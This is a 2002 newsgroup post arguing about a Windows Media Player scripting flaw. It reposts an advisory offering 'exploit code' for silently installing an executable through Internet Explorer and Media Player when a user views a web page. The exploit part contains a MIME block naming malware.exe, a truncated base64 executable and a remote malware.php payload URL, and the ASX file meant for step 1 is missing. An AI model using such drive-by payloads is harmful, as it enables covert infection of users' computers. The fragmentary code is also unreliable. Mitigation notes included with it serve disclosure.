From: "Geo." 

"Rich"  wrote in message news:3e28fd64{at}w3.nls.net...

>>   Not only does what you identify as the 2002-08-22 issue have nothing to
do with scripting, it is IE issue MS02-47.  The security focus folks
demonstrated their own lack of research here claiming what looks like every
version of WMP is affected when even the description they provide makes it
obvious this is false.<<

the asx file is basically the same thing as a shortcut the asf file has a
script section in it which media player happily executes, if that isn't
scripting then what is? You try to say IE does the execution, but active
scripting is a shared component with media player, in this context it's
media player that is running the script not IE.

Nice try though Rich.

Geo. (exploit code below)

Wednesday, August 21, 2002

Dear Mister,

'silent delivery and installation of an executable on the target
computer, no client input other than viewing a web page' default
installation of Internet Explorer and Windows Media Player.

This is truly terrible. In addition to server side '404 errors', cookies
and who knows what else [perhaps user.dat, index.dat, even the old
inbox.mbx], the Windows Media Player appears to be severely affected by
Jelmer codebase too.

Combing the Jelmer codebase, the Sandblad dot bug and the 1 year old
wimpy'flication of the media player [see:
http://www.malware.com/wimpy.html]

1. Create an *.asx meta file as follows:





MIME-Version: 1.0
Content-Location:file:///malware.exe
Content-Transfer-Encoding: base64

TVpEAQUAAgAgACEA//91AAACAACZAAAAPgAAAAEA+zBqcgAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA


 http://www.malware.com/malware.php

Important Notes:

1. Suggestions have been made that in this particular instance, the dot bug
is not necessary.
2. Suggestions have been made that the 'open'  "object" hole of
http://online.securityfocus.com/bid/5196 will work just as well 3. Disable
Active Scripting
4. Disable Media Download [if you can] 5. Change the default location of
"My Music..." 5. Hopefully this will all be a bad memory once all
the patches. packs, whatever are finally released. 6. Forget about the
'glitzy' advertising. Think long and hard about the products you install

Pathetic Notes:

A.

1. The codebase 'vulnerability' is over 2 years old. Demonstrated in a
different form and mentioned in its current form in June 2000 2.
Resurrected in fine fashion at the end of 2001 by the Pull with many others
demonstrating similar thereafter 3. Added to in splendid fashion by Jelmer
in July 2002 with key protocol


B. The dot bug by Sandblad of May 2002, patched, not patched, fully
functional to date. With patch and without patch. Not even actually
required in this instance.

C. The malware *.asx meta file and packable transportable  *.wmd of June 2001.

Helpful Notes:

Instead of sitting around trying to thinking up ways that all these things
cannot work, simply fix it the first time round.  There is no such thing as
'mitigating factors' and 'hurdles'. This is a lie. Pure fantasy. Fiction.
Fix it when you can ! For every way you think it cannot be done, there are
10 ways it actually can !

This concludes our summer session and as we are entering junior high for
the first time in a couple weeks, we need to tinker with our bicycles while
there is still sunlight.

Trust that clarifies matters for you.

Your friend and mine
http://www.malware.com [MVP - malware]

This posting is provided "AS IS" with no warranties, and confers no rights.

Over and Out

--
http://www.malware.com

--- BBBS/NT v4.01 Flag-4
 * Origin: Barktopia BBS Site http://HarborWebs.com:8081 (1:379/1.45)

SEEN-BY: 633/267 270

@PATH: 379/1 633/267